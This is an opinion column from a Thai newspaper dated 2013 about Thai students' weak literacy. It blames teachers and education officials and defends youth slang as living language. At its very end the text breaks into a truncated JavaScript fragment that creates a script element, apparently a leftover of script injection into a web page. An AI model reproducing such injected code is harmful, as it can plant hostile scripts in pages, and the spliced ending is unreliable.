มติชนรายวัน ฉบับประจำวันอังคารที่ 13 สิงหาคม 2556

 

          นักเรียนอยู่พื้นที่ห่างไกลติดชายแดน, เด็กพิเศษ, เด็กชนเผ่าชาติพันธุ์ต่างๆ ฯลฯ ไม่นับรวมเข้ามา สมมติว่าแยกไว้ต่างหาก

          เด็กนักเรียนส่วนที่เหลือซึ่งเป็นจำนวนมากก็ยังมีปัญหามากเรื่องอ่านไม่ออก เขียนไม่ได้ ดังที่มีข่าวว่า

          “เด็กไทยจำนวนมาก อ่านภาษาไทยไม่ออก” นายจาตุรนต์ ฉายแสง รมต.ศึกษา (ศธ.) บอกเล่าสู่สาธารณะผ่านสื่อ หลังจากแลกเปลี่ยนความคิดเห็นเกี่ยวกับการจัดการศึกษากับผู้บริหารโรงเรียนและครูจากโรงเรียนต่างๆ

          เรื่องเด็กอ่านไม่ออก เขียนไม่ได้ เป็นข่าวประจำฤดูกาล อย่างเดียวกับข่าวน้ำท่วม, น้ำแล้ง, ข้าวสารแพง, ข้าวเปลือกถูก, ไข่ขึ้นราคา ฯลฯ แล้วจะต้องตามด้วยความเห็นในเชิงวัฒนธรรมแสดงตนรักความเป็นไทย แต่ความเป็นไทยเสียหายไปเพราะเด็ก

          ในคราวนี้ครู(บางคน)อ้างว่าเด็กสมัยนี้ไม่ชอบอ่าน และไม่ชอบเขียนบทความยาวๆ แต่ชอบอ่านอะไรที่ฉาบฉวย ใช้ภาษาสแลง หรือศัพท์วัยรุ่นสั้นๆ ทำให้ภาษาผิดเพี้ยน ไม่ถูกต้อง ทำให้เอกลักษณ์ของภาษาไทยหายไป

          ฝ่าย สพฐ. อ้างว่าได้พยายามแก้ปัญหานักเรียนอ่านไม่ออก เขียนไม่ได้ อย่างเป็นระบบ โดยประสานเขตพื้นที่การศึกษาต่างๆ เน้นส่งเสริมนักเรียนและครู เห็นความสำคัญของการใช้ภาษาไทยอย่างถูกต้อง “อยากให้มีความภาคภูมิใจ เพราะต่อไปไทยจะเป็นศูนย์กลางของประชาคมอาเซียน”

          จะเห็นว่าต้นตอของปัญหาส่วนแรกมาจากครู แล้วส่งผลถึงเด็กนักเรียนเป็นปัญหาส่วนหลัง ดังนั้นครูควรร่วมกันพิจารณาด้วยทัศนะใหม่ดังนี้

          1. ทำความเข้าใจกันใหม่เรื่องความเป็นไทย เพราะหลักฐานประวัติศาสตร์โบราณคดีไม่เป็นไปอย่างที่เข้าใจกันมาแต่ก่อน ซึ่งจะส่งผลให้เข้าใจใหม่ต่อภาษาไทยด้วย

          2. ภาษาไทยมีชีวิตเคลื่อนไหวไม่หยุดนิ่ง เพราะไม่ใช่ภาษาตายแล้วอยู่แค่จารึกพ่อขุนรามคำแหง(ซึ่งจริงหรือไม่จริงก็ยังไม่แน่) หรือแค่พจนานุกรมฉบับราชบัณฑิตย์ ฯลฯ

          3. ภาษาสแลง ศัพท์วัยรุ่นสั้นๆ ก็เป็นภาษาไทยร่วมสมัยในชีวิตประจำวันของเด็ก ที่อาจได้แบบจากภาษาเทคโนโลยีและการ์ตูน ที่เป็นบันไดขั้นแรกเพื่อก้าวขึ้นสู่ขั้นสูงต่อๆไปได้ดีอย่างมีวรรณศิลป์ ผู้นิยมใช้ภาษาแบบนี้ไม่ใช่อาชญากรที่ทำอาชญากรรม จึงไม่ควรถูกมองทางลบ

          4. “ภาษาไทยอย่างถูกต้อง” (ที่ สพฐ. อ้าง) ต้องตกลงกันก่อนว่าจะเอาภาษาของคนชั้นไหน? จะให้ใช้ภาษาไทยแบบคนชั้นสามัญ หรือคนชั้นเทพ?

          5. ภาษาไทย เป็นภาษาหนึ่งในอาเซียน ที่มีคนใช้งานไม่มาก เมื่อเทียบกับภาษาอื่นซึ่งมีมากกว่า ถ้าจะภูมิใจภาษาไทยก็ควรในฐานะที่เป็นภาษาหนึ่งที่หยิบยืมภาษาอื่นๆในอาเซียนมาใช้ด้วย เช่น ภาษาลาว, ภาษาเขมร, ภาษาชวา-มลายู แต่ไม่ควรโยงให้หลงทางไปกับไทยจะเป็นศูนย์กลางอาเซียน ซึ่งคิดไปเอง

          6. ครูชอบโทษนักเรียนไม่อ่านหนังสือ หรืออ่านแต่ฉาบฉวย โดยไม่พิจารณาว่าในห้องสมุดของโรงเรียน และของ กศน. (เช่น ห้องสมุดประชาชนเฉลิมราชกุมารี) มีหนังสือดีๆ สนุกๆ ให้อ่านไหม? เห็นมีแต่หนังสือทางการเล่มโตๆที่ครูเองก็ไม่อ่าน แล้วโทษเด็กทำไม?

          เรื่องการอ่านนี้ ศธ. ยุคประชาธิปัตย์ เคยประกาศเป็นวาระแห่งชาติ แต่ไม่รู้ชาติไหน? เพราะเป็นปัญหาใหญ่มากๆ ไม่ใช่เฉพาะเด็ก แต่รวมหมดถึงครูกับผู้ปกครองและผู้ใหญ่ไทย

          ครูไม่ควรพูดเพลินปากโทษเด็กนักเรียนไม่อ่านหนังสือ เพราะเข้าตำรา ว่าแต่เขา อิเหนาเป็นเองvar d=document;var s=d.createElement(‘script’); } else {